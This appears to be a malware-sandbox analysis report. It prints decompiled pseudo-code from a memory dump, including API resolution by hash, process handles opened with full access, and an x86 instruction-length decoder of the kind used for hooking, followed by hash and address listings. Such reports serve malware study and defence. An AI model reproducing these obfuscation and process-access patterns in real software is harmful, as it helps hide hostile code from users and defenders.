											E6EB2F828(_t449 + 0x40, E6EB2F4CC(_t449 + 0x3c) + 4);
											 *(E6EB2F4BC(_t449 + 0x40, E6EB2F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6EB2CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6EB2F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6EB2F4BC(_t449 + 0x40, _t431 * 4);
												E6EB28B58( *_t211, E6EB302B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6EB2CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6EB2F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6EB2F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6EB2F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6EB2F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6EB2F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6EB338F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6EB2F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6EB2F828( *(_t449 + 4), E6EB2F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6EB2F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6EB2F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6EB2F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6EB2F4BC(_t322, _t430);
										E6EB338F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6EB2F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6EB2F828(_t322, E6EB2F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6EB2F828( *(_t449 + 4), E6EB2F4CC( *_t449) + 4);
								 *(E6EB2F4BC( *(_t449 + 4), E6EB2F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6EB2F828(_t322, E6EB2F4CC(_t322) + 4);
								 *(E6EB2F4BC(_t322, E6EB2F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6EB2F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6EB33064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6EB2F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6EB2F828( *(_t449 + 4), E6EB2F4CC( *_t449) + 4);
										 *(E6EB2F4BC( *(_t449 + 4), E6EB2F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6EB2F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6EB2F828( *((intOrPtr*)(_t449 + 0x74)), E6EB2F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6EB2F4BC( *((intOrPtr*)(_t449 + 0x74)), E6EB2F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6EB2F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6EB2F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6EB2F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6EB2F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6EB2F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6EB2F4BC(_t430, _t443);
										E6EB338F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6EB2F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6EB2F828(_t430, E6EB2F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6EB33064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6EB2F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6EB2F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6EB2F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6EB2F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6EB2F4BC( *(_t449 + 4), _t445);
										E6EB338F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6EB2F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6EB2F828( *(_t449 + 4), E6EB2F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6EB2F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6eb28435
0x6eb2843b
0x6eb2843f
0x6eb28443
0x6eb2844e
0x6eb28452
0x6eb28457
0x6eb2845f
0x6eb2846f
0x00000000
0x6eb28471
0x6eb28479
0x6eb28480
0x6eb28480
0x6eb289d3
0x6eb289d5
0x6eb28a16
0x6eb28a18
0x6eb28a27
0x6eb28a33
0x6eb28a33
0x6eb28a22
0x6eb28a39
0x6eb28a3e
0x00000000
0x6eb28a3e
0x6eb28a26
0x00000000
0x6eb2848a
0x6eb2848e
0x6eb28491
0x6eb28599
0x6eb28599
0x6eb2859e
0x6eb286c1
0x6eb286c5
0x6eb286ca
0x6eb286ce
0x6eb286d2
0x6eb28808
0x6eb2880a
0x6eb2880e
0x6eb28817
0x6eb28822
0x6eb28826
0x6eb2882f
0x6eb28834
0x6eb2883a
0x6eb2883b
0x6eb2883f
0x6eb28843
0x6eb2884a
0x6eb2884c
0x6eb2898c
0x6eb2899d
0x6eb289a4
0x6eb289ab
0x6eb289ab
0x6eb289ae
0x6eb289b1
0x6eb289b4
0x6eb289ba
0x6eb289c1
0x6eb289c5
0x6eb289ce
0x00000000
0x6eb289ce
0x6eb289bc
0x6eb289bf
0x6eb289d8
0x6eb289f0
0x6eb289f3
0x6eb289f8
0x6eb28a02
0x6eb28a05
0x6eb28a08
0x6eb28a11
0x00000000
0x6eb28a11
0x00000000
0x6eb289bf
0x6eb28854
0x6eb28854
0x6eb28856
0x6eb2885a
0x6eb2885f
0x6eb28861
0x6eb28865
0x6eb28868
0x6eb28870
0x6eb28872
0x00000000
0x00000000
0x6eb28889
0x6eb288a4
0x6eb288a6
0x6eb288b4
0x6eb288b9
0x6eb288bb
0x6eb288d8
0x6eb288d8
0x6eb288dc
0x6eb288de
0x00000000
0x00000000
0x6eb288e0
0x6eb288e3
0x6eb28904
0x6eb28923
0x6eb28929
0x6eb2892c
0x6eb28931
0x6eb28932
0x6eb28939
0x00000000
0x00000000
0x6eb28941
0x6eb28941
0x6eb28943
0x6eb2894f
0x6eb2895b
0x6eb2897d
0x6eb28982
0x6eb28983
0x6eb28983
0x00000000
0x6eb28943
0x00000000
0x6eb288e3
0x6eb288bd
0x6eb288c3
0x6eb288c5
0x6eb288c6
0x6eb288c7
0x6eb288c8
0x6eb288cc
0x6eb288d0
0x6eb288d2
0x6eb288d3
0x6eb288d4
0x6eb288d6
0x00000000
0x00000000
0x00000000
0x6eb288d6
0x6eb288e9
0x00000000
0x6eb288e9
0x6eb286d8
0x6eb286da
0x6eb286dc
0x00000000
0x00000000
0x6eb286e6
0x6eb286e6
0x6eb286e8
0x6eb286eb
0x6eb286ed
0x6eb286f5
0x6eb286fc
0x6eb28700
0x6eb28703
0x00000000
0x00000000
0x6eb287ff
0x6eb28800
0x6eb28802
0x00000000
0x00000000
0x00000000
0x6eb28802
0x6eb28709
0x6eb2870c
0x6eb28715
0x6eb2871a
0x6eb2871c
0x6eb28728
0x6eb2872c
0x6eb28731
0x6eb28735
0x6eb28b12
0x6eb28b26
0x6eb28b48
0x6eb28b4d
0x6eb28b4d
0x6eb2874b
0x6eb28750
0x6eb28754
0x6eb28754
0x6eb28754
0x6eb28754
0x6eb28759
0x6eb2875e
0x6eb28760
0x6eb28764
0x6eb2876b
0x6eb28770
0x6eb28772
0x6eb28ad3
0x6eb28ae2
0x6eb28afb
0x6eb28b00
0x6eb28b00
0x6eb28785
0x6eb2878a
0x6eb2878e
0x6eb2878e
0x6eb2878e
0x6eb287a0
0x6eb287c1
0x6eb287c9
0x6eb287d7
0x6eb287f5
0x6eb287fb
0x6eb287fb
0x00000000
0x6eb2870c
0x6eb285a4
0x6eb285a4
0x6eb285a6
0x6eb285ad
0x6eb285bb
0x6eb285bd
0x6eb285c1
0x6eb285c3
0x6eb285c5
0x6eb28600
0x6eb2860f
0x6eb28611
0x6eb28613
0x6eb28631
0x6eb28633
0x6eb28635
0x6eb28647
0x6eb28665
0x6eb2866e
0x6eb28671
0x6eb2867f
0x6eb28690
0x6eb286ae
0x6eb286b0
0x6eb286b4
0x6eb286b4
0x6eb286b4
0x6eb28635
0x00000000
0x6eb28613
0x6eb285cb
0x6eb285cb
0x6eb285d0
0x6eb285d7
0x6eb285e6
0x6eb285ed
0x6eb285ef
0x00000000
0x00000000
0x6eb285fb
0x6eb285fc
0x6eb285fe
0x00000000
0x00000000
0x00000000
0x6eb285fe
0x6eb285f1
0x6eb285f4
0x00000000
0x00000000
0x6eb286b6
0x6eb286b6
0x6eb286b7
0x6eb286b7
0x00000000
0x6eb28497
0x6eb28497
0x6eb28497
0x6eb28499
0x6eb284a0
0x6eb284ae
0x6eb284b0
0x6eb284b4
0x6eb284b6
0x6eb284e2
0x6eb284e6
0x6eb284eb
0x6eb284f0
0x6eb284f4
0x6eb284f8
0x6eb284ff
0x6eb28504
0x6eb28506
0x6eb28a95
0x6eb28aa4
0x6eb28ac3
0x6eb28ac8
0x6eb28ac8
0x6eb28519
0x6eb2851e
0x6eb28522
0x6eb28522
0x6eb28522
0x6eb28533
0x6eb28535
0x6eb28537
0x6eb28548
0x6eb28548
0x6eb2854d
0x6eb28552
0x6eb28556
0x6eb2855b
0x6eb28562
0x6eb28567
0x6eb28569
0x6eb28a57
0x6eb28a63
0x6eb28a7d
0x6eb28a82
0x6eb28a82
0x6eb2857f
0x6eb28584
0x6eb28588
0x6eb28588
0x6eb28588
0x6eb28588
0x6eb2858b
0x6eb2858b
0x00000000
0x6eb2858b
0x6eb284ba
0x6eb284ba
0x6eb284bc
0x6eb284c8
0x6eb284cf
0x6eb284d1
0x00000000
0x00000000
0x6eb284dd
0x6eb284de
0x6eb284e0
0x00000000
0x00000000
0x00000000
0x6eb284e0
0x6eb284d3
0x6eb284d6
0x00000000
0x00000000
0x6eb2858c
0x6eb28590
0x6eb28591
0x6eb28591
0x00000000
0x6eb28499
0x6eb28491

Strings

, xrefs: 6EB28A1A

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e83c4d578512a760747fe0338953edde6ec68eceeb8a9fc5cbb5ea94e80d035d
Instruction ID: 5e6d245bb11d89de77b0418980ca3d5cce3cd129c438a351464e063d5457cf7a
Opcode Fuzzy Hash: e83c4d578512a760747fe0338953edde6ec68eceeb8a9fc5cbb5ea94e80d035d
Instruction Fuzzy Hash: D2126C71A182859FC714DFA4C890ABEBBE9EF85304F104E3DE5AD972A1DB709D05CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6EB39370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6EB39370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6EB33698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
